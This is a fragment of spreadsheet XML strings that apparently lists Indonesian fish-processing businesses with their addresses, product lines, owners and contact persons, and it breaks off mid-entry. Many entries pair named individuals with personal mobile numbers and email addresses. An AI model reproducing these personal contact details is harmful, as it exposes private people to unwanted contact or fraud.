  <si>
    <t>Jl. Siliwangi Pelabuhan Perikanan Nusantara, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>SHOULI MA</t>
  </si>
  <si>
    <t>tanzilalamin35@gmail.com</t>
  </si>
  <si>
    <t>0266 434445</t>
  </si>
  <si>
    <t>TANZIL ALAMIN 081287287091/ 085846539044</t>
  </si>
  <si>
    <t>ADIDIN AHSAKATMA</t>
  </si>
  <si>
    <t>RUMAH IKAN</t>
  </si>
  <si>
    <t>Kampus UMMU Ternate, Jl. KH. A. Dahlan No.100, Kel. Sasa, Kec. Ternate Selatan, Kota Ternate</t>
  </si>
  <si>
    <t>Tuna Rica-Rica Kaleng, Tuna Kering Kayu Kaleng</t>
  </si>
  <si>
    <t>Umar Tangke</t>
  </si>
  <si>
    <t>Ternate Selatan</t>
  </si>
  <si>
    <t>Sasa</t>
  </si>
  <si>
    <t>khakafart@yahoo.com</t>
  </si>
  <si>
    <t>0921-6206370</t>
  </si>
  <si>
    <t>Umar Tangke, 082231453888</t>
  </si>
  <si>
    <t>Waty Ely</t>
  </si>
  <si>
    <t>Jl. Worang By Pass, Desa Kaima, Kec. Kauditan, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Tuna Beku, Ikan Pelagis Beku, Tuna Segar</t>
  </si>
  <si>
    <t>Kaima</t>
  </si>
  <si>
    <t>mariaflorentina_cwf@yahoo.co.id</t>
  </si>
  <si>
    <t>0438 - 52213</t>
  </si>
  <si>
    <t>Maria Lero 082124667549</t>
  </si>
  <si>
    <t>Krisna Rianto</t>
  </si>
  <si>
    <t>UD. BERKAH ADI PUTRA</t>
  </si>
  <si>
    <t>Dusun Punden RT 3 RW 2, Kel. Jeblog, Kec. Talun, Kabupaten Blitar</t>
  </si>
  <si>
    <t>HENDRI EKO WIYONO</t>
  </si>
  <si>
    <t>TALUN</t>
  </si>
  <si>
    <t>JEBLOG</t>
  </si>
  <si>
    <t>udberkahadiputra@gmail.com</t>
  </si>
  <si>
    <t>085855216221/081235803569</t>
  </si>
  <si>
    <t>HENDRI EKO WIYONO 085855216221/081235803569 Ilmayuni Royani Disnakan Kab. Blitar 081515187965</t>
  </si>
  <si>
    <t>PT. FISHING TRADE INTERNATIONAL</t>
  </si>
  <si>
    <t>Lingkungan III RT 013 RW 003, Kel. Madidir Unet, Kec. Madidir, Kota Bitung</t>
  </si>
  <si>
    <t>Tuna Loin Segar</t>
  </si>
  <si>
    <t>NABSAR BADOA</t>
  </si>
  <si>
    <t>Madidir Unet</t>
  </si>
  <si>
    <t>ftinternational01@gmail.com</t>
  </si>
  <si>
    <t>NABSAR BADOA 082291160427/ Cintia 085242761628</t>
  </si>
  <si>
    <t>UD. MINA PERKASA</t>
  </si>
  <si>
    <t>Kawasan PPN Prigi, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek</t>
  </si>
  <si>
    <t>minaperkasa007@gmail.com</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan PPS Nizam Zachman Blok K 7D, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Hiu Beku, Sirip Hiu Beku</t>
  </si>
  <si>
    <t xml:space="preserve">Asman </t>
  </si>
  <si>
    <t>qcjakarta@arabikatama.com</t>
  </si>
  <si>
    <t>021-66604850</t>
  </si>
  <si>
    <t>ERVIN SUTIOSO 08111030377</t>
  </si>
  <si>
    <t>Alexander S Tefnai</t>
  </si>
  <si>
    <t>Komp Industri Pergudangan Safe N Lock, Jl. Lingkar Timur O No.1770, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Kenrick Ongara</t>
  </si>
  <si>
    <t>rusitadwi0@gmail.com</t>
  </si>
  <si>
    <t>PT. BINTANG MEGAH JAYA PERKASA</t>
  </si>
  <si>
    <t>Jl. Batangase No.50, Kel. Batangase, Kec. Bontoa, Kabupaten Maros</t>
  </si>
  <si>
    <t>Udang Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Tuna Segar</t>
  </si>
  <si>
    <t>ADIFIN NURMIN</t>
  </si>
  <si>
    <t>Batangase</t>
  </si>
  <si>
    <t>bintangmegahjayaperkasa@gmail.com</t>
  </si>
  <si>
    <t>0811 4131 302</t>
  </si>
  <si>
    <t>ADIFIN NURMIN 085255628580</t>
  </si>
  <si>
    <t>CV. 88 AURORA</t>
  </si>
  <si>
    <t>Jl. Raya By Pass BIL KM-15, Kel. Jonggat, Kec. Labulia, Kabupaten Lombok Tengah</t>
  </si>
  <si>
    <t>Fillet Patin Beku, Ikan Air Tawar Beku, Bandeng Beku, Salmon Beku</t>
  </si>
  <si>
    <t>Calvin Oktavianus Pratama</t>
  </si>
  <si>
    <t>Labulia</t>
  </si>
  <si>
    <t>Jonggat</t>
  </si>
  <si>
    <t>gudangcoldstorage@cv88.co.id</t>
  </si>
  <si>
    <t>0370-672459</t>
  </si>
  <si>
    <t>drh. Mergayanti Yudanta Eka Putri / 081907582071</t>
  </si>
  <si>
    <t>PT. HALAL INTERNUSA MEGA</t>
  </si>
  <si>
    <t>Kawasan Industri dan Pergudangan Marunda Center Blok Q2 No.23A, Jl. Marunda Makmur, Kel. Segaramakmur, Kec. Tarumanegara, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Teri Kering, Ikan Pelagis Beku, Cephalopoda Kering</t>
  </si>
  <si>
    <t>Surono</t>
  </si>
  <si>
    <t>Tarumanegara</t>
  </si>
  <si>
    <t>Segaramakmur</t>
  </si>
  <si>
    <t>halalinternusamega@yahoo.com</t>
  </si>
  <si>
    <t>021 24520637</t>
  </si>
  <si>
    <t>Selvi 081223032224</t>
  </si>
  <si>
    <t>PT. INDOSUKSES MANDIRI ABADI</t>
  </si>
  <si>
    <t>Desa Molowahu, Kec. Tibawa, Kabupaten Gorontalo</t>
  </si>
  <si>
    <t>Udang Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Air Tawar Beku, Bandeng Beku, Tuna Beku, Tuna Loin Segar</t>
  </si>
  <si>
    <t>KUKUH SULAKSONO</t>
  </si>
  <si>
    <t>Tibawa</t>
  </si>
  <si>
    <t>Molowahu</t>
  </si>
  <si>
    <t>ami.gto2020@gmail.com</t>
  </si>
  <si>
    <t>Bambang Sulistyo, 081342010504</t>
  </si>
  <si>
    <t>PT. TRITOBA SAMUDERA INDONESIA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung No 1,2,11,12 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>HORISON SULYSTIO DAN SUHANTO SULYSTIO</t>
  </si>
  <si>
    <t>tritoba.tsi@gmail.com</t>
  </si>
  <si>
    <t>021-6632569</t>
  </si>
  <si>
    <t>FENI 089654898608</t>
  </si>
  <si>
    <t>YANTO SULYSTIO</t>
  </si>
  <si>
    <t>CV. DELTA MINA JAYA</t>
  </si>
  <si>
    <t>Pergudangan Safe N Lock Blok F-1532, Jl. Lingkar Timur Km 5,5, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>ASRUL SANI, SE</t>
  </si>
  <si>
    <t>dmj.jaya99@gmail.com</t>
  </si>
  <si>
    <t>031-8958792</t>
  </si>
  <si>
    <t>NIA - 08125 9080480</t>
  </si>
  <si>
    <t>PT. AGUNG JAYASARI SAKTI</t>
  </si>
  <si>
    <t>Jl. Raya Palembang - Prabumulih Km 29, Kel. Palem Raya, Kec. Indralaya Utara, Kabupaten Ogan Ilir</t>
  </si>
  <si>
    <t>Paha Kodok Beku, Paha Kodok Masak Beku</t>
  </si>
  <si>
    <t>Indrawaty Teddy</t>
  </si>
  <si>
    <t>Indralaya Utara</t>
  </si>
  <si>
    <t>Palem Raya</t>
  </si>
  <si>
    <t>pt.agungjayasarisakti@yahoo.co.id</t>
  </si>
  <si>
    <t>Amin Budiman Teddy 081532700090</t>
  </si>
  <si>
    <t>Amin Budiman Teddy</t>
  </si>
  <si>
    <t>PT. KELOLA MINA SAMUDRA</t>
  </si>
  <si>
    <t>Komplek PPN Ternate, Jl. Pasar Inpres Bastiong No.97, Kel. Bastiong Talangame, Kec. Ternate Selatan, Kota Ternate</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Loin Segar</t>
  </si>
  <si>
    <t>SEKENDRI</t>
  </si>
  <si>
    <t>Bastiong Talangame</t>
  </si>
  <si>
    <t>niluhmariani96@gmail.com</t>
  </si>
  <si>
    <t>NI LUH MARIANI &amp; 082347393662</t>
  </si>
  <si>
    <t>NI LUH MARIANI</t>
  </si>
  <si>
    <t>PT. SUMBER ANUGERAH BAHARI</t>
  </si>
  <si>
    <t>Jl. Sagerat Tanjung Merah, Kel. Sagerat, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>MENDY HERMAWAN</t>
  </si>
  <si>
    <t>sabbitung2020@gmail.com</t>
  </si>
  <si>
    <t>BU SRI</t>
  </si>
  <si>
    <t>Jl. Kuala Lempuing No.18, Kel. Lempuing, Kec. Ratu Agung, Kota Bengkulu</t>
  </si>
  <si>
    <t>Abon Tuna, Bandeng Presto</t>
  </si>
  <si>
    <t>Sri Daryanti</t>
  </si>
  <si>
    <t>Ratu Agung</t>
  </si>
  <si>
    <t>Lempuing</t>
  </si>
  <si>
    <t>sriskp2020@gmail.com</t>
  </si>
  <si>
    <t>Sri Daryanti / 08136737984</t>
  </si>
  <si>
    <t>PT. BUMI MENARA INTERNUSA</t>
  </si>
  <si>
    <t>Jl. Pulau Sumbawa II No.5A KIM II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang</t>
  </si>
  <si>
    <t>marsaulina_0410@yahoo.co.id</t>
  </si>
  <si>
    <t>061-42068300</t>
  </si>
  <si>
    <t>Lina 08126407278</t>
  </si>
  <si>
    <t>LEONARDY</t>
  </si>
  <si>
    <t>SUMBER REJEKI</t>
  </si>
  <si>
    <t>Perum Bukit Pinang Bahari Blok AA5 No.1, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda</t>
  </si>
  <si>
    <t>Otak-Otak Bandeng, Bandeng Tanpa Duri, Bandeng Presto</t>
  </si>
  <si>
    <t>Uriyati</t>
  </si>
  <si>
    <t>rsumber023@gmail.com</t>
  </si>
  <si>
    <t>Uriyati 081253024923</t>
  </si>
  <si>
    <t>Jl. Ancol III No. 1-2, Kel. Ancol Barat, Kec. Pademangan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Eric Halim</t>
  </si>
  <si>
    <t>Ancol Barat</t>
  </si>
  <si>
    <t>qa.wirontono5@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">021- 6907792, 021-6907169 </t>
  </si>
  <si>
    <t>Eddy Karmin (021) 6907792 ext.107</t>
  </si>
  <si>
    <t>Eddy Karmin</t>
  </si>
  <si>
    <t>CV. KIRANA BAHARI INDONESIA</t>
  </si>
  <si>
    <t>Jl. Rembang Industri II No.34, Kawasan Industri Rembang (PIER), Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>JOKO SARWONO</t>
  </si>
  <si>
    <t>kiranabahari.indonesia@gmail.com</t>
  </si>
  <si>
    <t>0343-5431660</t>
  </si>
  <si>
    <t>BAHARUDDIN 081330460742</t>
  </si>
  <si>
    <t>PT. TRI NUSANTARA MAKMUR</t>
  </si>
  <si>
    <t>Jl. Margomulyo Indah 1 F No.23, Kel. Balongsari, Kec. Tandes, Kota Surabaya</t>
  </si>
  <si>
    <t>THE HENGKY</t>
  </si>
  <si>
    <t>Balongsari</t>
  </si>
  <si>
    <t>pt.trinusamakmur@gmail.com</t>
  </si>
  <si>
    <t>ELIZABETH 0813 3002 0684</t>
  </si>
  <si>
    <t>WIPINWIDJAJA ATMADJA</t>
  </si>
  <si>
    <t>Komplek Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku, Ikan Demersal Beku, Tuna Loin Beku</t>
  </si>
  <si>
    <t>Patria Perikanan Lestari Indonesia</t>
  </si>
  <si>
    <t>dedeusmans1776@gmail.com</t>
  </si>
  <si>
    <t>Johanes Puguh</t>
  </si>
  <si>
    <t>PT. KARYA MANUNGGAL PRIMA SUKSES</t>
  </si>
  <si>
    <t>Jl. Tratas No. 37, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Ir. BUDI ANTONI</t>
  </si>
  <si>
    <t>mademaharta1960@gmail.com</t>
  </si>
  <si>
    <t>0333593473 / Pak Made 08123245769</t>
  </si>
  <si>
    <t>SETIA USAHA</t>
  </si>
  <si>
    <t>Jl. Selumit Pantai RT 21, Kel. Selumit Pantai, Kec. Tarakan Tengah, Kota Tarakan</t>
  </si>
  <si>
    <t>Udang Kering</t>
  </si>
  <si>
    <t>H. Sulaiman</t>
  </si>
  <si>
    <t>Tarakan Tengah</t>
  </si>
  <si>
    <t>Selumit Pantai</t>
  </si>
  <si>
    <t>indiantinr@gmail.com</t>
  </si>
  <si>
    <t>Indianti Novita Rizki / 082159516391</t>
  </si>
  <si>
    <t>Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Cephalopoda Beku, Tuna Beku, Ikan Demersal Beku, Ikan Hasil Budidaya Beku, Scallop Beku, Ikan Pelagis Beku, Salmon Beku</t>
  </si>
  <si>
    <t>Tandes Lor</t>
  </si>
  <si>
    <t>qa.ketut@ptbmi.com</t>
  </si>
  <si>
    <t>031-7491000</t>
  </si>
  <si>
    <t>ANDI WIJAYA</t>
  </si>
  <si>
    <t>CV. SATU WAHANA JAYA SENTOSA</t>
  </si>
  <si>
    <t>Jl. Lobak No.109 C, Kel. Delima, Kec. Tampan, Kota Pekanbaru</t>
  </si>
  <si>
    <t>Innayah Umnihanie,S.Pi</t>
  </si>
  <si>
    <t>Tampan</t>
  </si>
  <si>
    <t>Delima</t>
  </si>
  <si>
    <t>satuwahanajayasentosa@gmail.com</t>
  </si>
  <si>
    <t>Innayah Umnihanie,S.Pi/ 08127074312</t>
  </si>
  <si>
    <t>CV. BENGGAWI SUKSES SELALU</t>
  </si>
  <si>
    <t>Desa Gonggong, Kec. Banggai Tengah, Kabupaten Banggai Laut</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Tuna Beku, Udang Mentah Beku</t>
  </si>
  <si>
    <t>HANDI WIRAJAYA S.KOM</t>
  </si>
  <si>
    <t>Banggai Tengah</t>
  </si>
  <si>
    <t>Gonggong</t>
  </si>
  <si>
    <t>cvbenggawisuksesselalu@gmail.com</t>
  </si>
  <si>
    <t>085225395976, 082259265409</t>
  </si>
  <si>
    <t>IRAWAN 085280146399</t>
  </si>
  <si>
    <t>IRAWAN ATTAS S.ST.PI</t>
  </si>
  <si>
    <t>PT. LAUTINDO SYNERGY SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Sapari No.33 RT 001 RW 001 Dusun Tratas, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>PT LMA &amp; KKH</t>
  </si>
  <si>
    <t>ptlautindosynergys@gmail.com</t>
  </si>
  <si>
    <t>0333 5980000</t>
  </si>
  <si>
    <t>Ardianto Nugroho ( 085283023472 ), Faisal E W R ( 08128011994)</t>
  </si>
  <si>
    <t>Antoni Mulya Salim</t>
  </si>
  <si>
    <t>Jl. Margomulyo 4 E, Kel. Tandes, Kec. Tandes, Kota Surabaya</t>
  </si>
  <si>
    <t>marketing.phebe@ptbmi.com</t>
  </si>
  <si>
    <t>DIAN WULANDARI, +62821-3936-0658</t>
  </si>
  <si>
    <t>ANDREAS SUKOWIJOYO</t>
  </si>
  <si>
    <t>PT. BINA NELAYAN JAYA</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Tuna Loin Segar, Ikan Pelagis Beku, Ikan Demesal Beku, Tuna Loin Beku, Tuna Beku</t>
  </si>
  <si>
    <t>EDWIN HARTANTO</t>
  </si>
  <si>
    <t>pt.binanelayanjaya@gmail.com</t>
  </si>
  <si>
    <t>0951-3174055, 0951-3123682</t>
  </si>
  <si>
    <t>SINTYA RATULANGI 082188623397</t>
  </si>
  <si>
    <t>PT. INDUSTRI PERIKANAN NAMATOTA</t>
  </si>
  <si>
    <t>Kampung Namatota, Distrik Kaimana, Kabupaten Kaimana</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku</t>
  </si>
  <si>
    <t>PT INDUSTRI PERIKANAN NAMATOTA</t>
  </si>
  <si>
    <t>Namatota</t>
  </si>
  <si>
    <t>gerry_nelson@ymail.com</t>
  </si>
  <si>
    <t>(0957) 21233</t>
  </si>
  <si>
    <t>Gerry 081285777071</t>
  </si>
  <si>
    <t>SUKMA</t>
  </si>
  <si>
    <t>Jorong Setia Budi, Kel. Simalidu, Kec. Koto Salak, Kabupaten Dharmasraya</t>
  </si>
  <si>
    <t>Lele Asap</t>
  </si>
  <si>
    <t>ISMAIL EKO NUGROHO</t>
  </si>
  <si>
    <t>Koto Salak</t>
  </si>
  <si>
    <t>Simalidu</t>
  </si>
  <si>
    <t>erickharja1984@gmail.com</t>
  </si>
  <si>
    <t>Eko Ismail 081329694948</t>
  </si>
  <si>
    <t>PT. SAMUDERA PANGAN INDONESIA</t>
  </si>
  <si>
    <t>Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Segar, Beku, Asap</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Udang Segar, Kepiting Segar, Ikan Demersal Segar, Telur Ikan Segar, Ikan Pelagis Segar, Salmon Segar, Bulu Babi Segar, Kerang Segar, Tuna Segar, Cephalopoda Beku, Udang Beku, Kepiting Beku, Ikan Demersal Beku, Ikan Asap Beku, Bulu Babi Beku, Ikan Pelagis Beku, Telur Ikan Beku, Salmon Beku, Kerang Beku, Tuna Beku</t>
  </si>
  <si>
    <t>MR FATKUROCHIM</t>
  </si>
  <si>
    <t>halim@coldwarehouse.co.id</t>
  </si>
  <si>
    <t>MUHTHAR HALIM  081113604701</t>
  </si>
  <si>
    <t>Restu Nepti Pratiwi</t>
  </si>
  <si>
    <t>PT. KARYA PERSADA KHATULISTIWA</t>
  </si>
  <si>
    <t>Jl. Mina Ayu RT 13 RW 04, Kel. Limbangan, Kec. Juntinyuat, Kabupaten Indramayu</t>
  </si>
  <si>
    <t>Kaleng, Segar, -</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Kaleng, Rajungan Segar, Rajungan Rebus Dingin</t>
  </si>
  <si>
    <t>Raditya Wardhana</t>
  </si>
  <si>
    <t>Juntinyuat</t>
  </si>
  <si>
    <t>Limbangan</t>
  </si>
  <si>
    <t>karyapersadakhatulistiwa@gmail.com</t>
  </si>
  <si>
    <t>( 62 234 ) 428511, 428522</t>
  </si>
  <si>
    <t>H. Radawi / 082317114622</t>
  </si>
  <si>
    <t>H. Radawi</t>
  </si>
  <si>
    <t>PT. INDONESIA BRAZIL COFFEE</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto Km 6,2 No.89 RT 003 RW 006, Kel. Keroncong, Kec. Jatiuwung, Kota Tangerang</t>
  </si>
  <si>
    <t>Tuna Kaleng, Teri Kaleng, Daging Kepiting Kaleng, Sarden Kaleng, Makerel Kaleng</t>
  </si>
  <si>
    <t>YUDISTIRA WIGUNA</t>
  </si>
  <si>
    <t>Keroncong</t>
  </si>
  <si>
    <t>anitaapriliyanti8@gmail.com</t>
  </si>
  <si>
    <t>021-5907690</t>
  </si>
  <si>
    <t>YUDISTIRA 081310887010</t>
  </si>
  <si>
    <t>CV. HOKKY MAKMUR</t>
  </si>
  <si>
    <t>Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Tuna Beku, Cephalopoda Beku, Keong Beku, Kerang Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Udang Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>SADIMAN</t>
  </si>
  <si>
    <t>Bajarsari</t>
  </si>
  <si>
    <t>quality01.hokky@gmail.com</t>
  </si>
  <si>
    <t>031-99010468</t>
  </si>
  <si>
    <t>AZHAR ULUM HAMADY</t>
  </si>
  <si>
    <t>KOPERASI SYARIAH BINA MASYARAKAT SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Usman Harun RT 001, Kel. Sei Pancang, Kec. Sebatik Utara, Kabupaten Nunukan</t>
  </si>
  <si>
    <t>JUSMAN, S.Pd.I</t>
  </si>
  <si>
    <t>Sebatik Utara</t>
  </si>
  <si>
    <t>Sei Pancang</t>
  </si>
  <si>
    <t>jusmansebatik@gmail.com</t>
  </si>
  <si>
    <t>JUSMAN 082254756185</t>
  </si>
  <si>
    <t>SAMSIDAR, S.Tr.Pi</t>
  </si>
  <si>
    <t>DAUN SALAM JOGJA</t>
  </si>
  <si>
    <t>Plawonan, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul</t>
  </si>
  <si>
    <t>Lainnya, Lumatan Daging, Beku</t>
  </si>
  <si>
    <t>Otak-Otak Bandeng, Pepes Ikan, Sosis Ikan, Pepes Bandeng, Otak-Otak Tuna</t>
  </si>
  <si>
    <t>Imam Bukhori</t>
  </si>
  <si>
    <t>daunsalamyogya@gmail.com</t>
  </si>
  <si>
    <t>Muhzazin, 081328437614</t>
  </si>
  <si>
    <t>AGUNG NURI WIJAYA</t>
  </si>
  <si>
    <t>Jl. Balikpapan 2 / 03 GKB, Kel. Yosowilangun, Kec. Manyar, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Mie Bandeng</t>
  </si>
  <si>
    <t>Drs Agung Nuri Wijaya</t>
  </si>
  <si>
    <t>MANYAR</t>
  </si>
  <si>
    <t>YOSOWILANGUN</t>
  </si>
  <si>
    <t>hokkytop@gmail.com</t>
  </si>
  <si>
    <t>Drs Agung Nuri Wijaya  081235327403</t>
  </si>
  <si>
    <t>PT. MUARA JAYA ELOK</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke No.24, 26, 26A, 27, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>RUSLAN</t>
  </si>
  <si>
    <t>muarajaya26@yahoo.co.id</t>
  </si>
  <si>
    <t>021-66692008</t>
  </si>
  <si>
    <t>PT. SATYA TRINADI KOMIRA PERKASA</t>
  </si>
  <si>
    <t>Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Cephalopoda Segar, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Telur Ikan Terbang Beku, Telur Ikan Segar, Salmon Beku, Salmon Segar</t>
  </si>
  <si>
    <t>Emil Arifin</t>
  </si>
  <si>
    <t>herdiyanto994@gmail.com</t>
  </si>
  <si>
    <t>021 66604649</t>
  </si>
  <si>
    <t>Muh Firdaus &amp; 081141</t>
  </si>
  <si>
    <t>Dusun Krajan I RT 001 RW 003, Desa Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>ksi.bwi19@gmail.com</t>
  </si>
  <si>
    <t>Elok / 0817882729</t>
  </si>
  <si>
    <t>PT. HONGTAI LINTAS SAMUDRA</t>
  </si>
  <si>
    <t>Jl. By Pass Ngurah Rai No.626 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Kepiting Hidup, Lobster Hidup, Udang Ronggeng Hidup, Tuna Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Kerapu Hidup, Kerang Hidup, Sidat Hidup, Keong Hidup</t>
  </si>
  <si>
    <t>NANANG SOENGKONO</t>
  </si>
  <si>
    <t>hongtailintassamudra@gmail.com</t>
  </si>
  <si>
    <t>(0361) 4484980</t>
  </si>
  <si>
    <t>RATNA AYU WULANDARI 081905051994</t>
  </si>
  <si>
    <t>ONG RENDY</t>
  </si>
  <si>
    <t>CV. TUNA BAHARI</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Pantai Tumumpa, Kel. Tumumpa Dua, Kec. Tuminting, Kota Manado</t>
  </si>
  <si>
    <t>Tuna Loin Segar, Tuna Steak Segar, Tuna Saku Beku, Tuna Segar</t>
  </si>
  <si>
    <t>Walyadin Pomalingo</t>
  </si>
  <si>
    <t>Tuminting</t>
  </si>
  <si>
    <t>Tumumpa Dua</t>
  </si>
  <si>
    <t>paulusesterlia89@gmail.com</t>
  </si>
  <si>
    <t>Wirda taha dan 081241945074</t>
  </si>
  <si>
    <t>CV. SOLOP LESTARI</t>
  </si>
  <si>
    <t>Pantai Solop RT 04 RW 03, Kel. Pulau Cawan, Kec. Mandah, Kabupaten Indragiri Hilir</t>
  </si>
  <si>
    <t>Siput Hidup</t>
  </si>
  <si>
    <t>Ramlan</t>
  </si>
  <si>
    <t>Mandah</t>
  </si>
  <si>
    <t>Pulaucawan</t>
  </si>
  <si>
    <t>cv.soloplestari@gmail.com</t>
  </si>
  <si>
    <t>Ramlan 085374138666</t>
  </si>
  <si>
    <t>Jl. Agung Karya IV Blok B No.22, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Beku, Cephalopoda Segar, Cephalopoda Beku, Hati Ikan Segar, Hati Ikan Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Kepiting Segar, Kepiting Beku, Kerang Segar, Kerang Beku, Telur Ikan Segar, Telur Ikan Beku, Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Tuna Segar, Tuna Beku, Udang Segar, Udang Beku, Nori</t>
  </si>
  <si>
    <t>hongki@masuya.co.id</t>
  </si>
  <si>
    <t>021-6509130</t>
  </si>
  <si>
    <t>HONGKI LUKMAN SARDI (081586420640)</t>
  </si>
  <si>
    <t>PT. ALAM SAMUDRA TIMUR</t>
  </si>
  <si>
    <t>Jl. Teluk Waya, Kel. Waiya, Kec. Depapre, Kabupaten Jayapura</t>
  </si>
  <si>
    <t>NIMBROT YANCE RUMBRAPUK</t>
  </si>
  <si>
    <t>Depapre</t>
  </si>
  <si>
    <t>Waiya</t>
  </si>
  <si>
    <t>nimbrotn@yahoo.co.id</t>
  </si>
  <si>
    <t>NIMBROT YANCE RUMBRAPUK TLP 081344370722</t>
  </si>
  <si>
    <t>PT. DAYARA LAUT SEJAHTERA</t>
  </si>
  <si>
    <t>Pergudangan Sinar Buduran 3 Blok B23, Kel. Siwalan Panji, Kec. Buduran, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Bandeng Beku, Ikan Demersal Beku, Fillet Ikan Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>JOSEPH MUNTU</t>
  </si>
  <si>
    <t>josephmuntu02@yahoo.com</t>
  </si>
  <si>
    <t>SEPTY &amp; 081232114443</t>
  </si>
  <si>
    <t>AULI</t>
  </si>
  <si>
    <t>Jl. Plantar KUD, Kel. Tanjungpinang Kota, Kec. Tanjungpinang Kota, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>acuiauli@gmail.com</t>
  </si>
  <si>
    <t>081378289933, 08228411962</t>
  </si>
  <si>
    <t>CV. SAFAAT JAYA MANDIRI</t>
  </si>
  <si>
    <t>Desa Prigri RT 005 RW 001, Kel. Prigi, Kec. Watulimo, Kabupaten Trenggalek</t>
  </si>
  <si>
    <t>Fillet Ikan Beku</t>
  </si>
  <si>
    <t>Rizky Fajar Firmansyah</t>
  </si>
  <si>
    <t>cvsafaatjayamandiri@gmail.com</t>
  </si>
  <si>
    <t>Rizky Fajar Firmansyah/087853656993</t>
  </si>
  <si>
    <t>Kota Bitung, Kel. Manembo Nembo, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Manembo Nembo</t>
  </si>
  <si>
    <t>pt.sblti@gmail.com</t>
  </si>
  <si>
    <t>MOH. NURSAMSUDIN &amp; 082229496886</t>
  </si>
  <si>
    <t>CV. DAYA HASIL LAUT CILACAP</t>
  </si>
  <si>
    <t>Jl. Majapahit No.1, Kel. Tegalkatimulyan, Kec. Cilacap Selatan, Kabupaten Cilacap</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Lobster Hidup, Udang Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Cephalopoda Beku, Lobster Beku, Udang Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>YAYA SUDARYA</t>
  </si>
  <si>
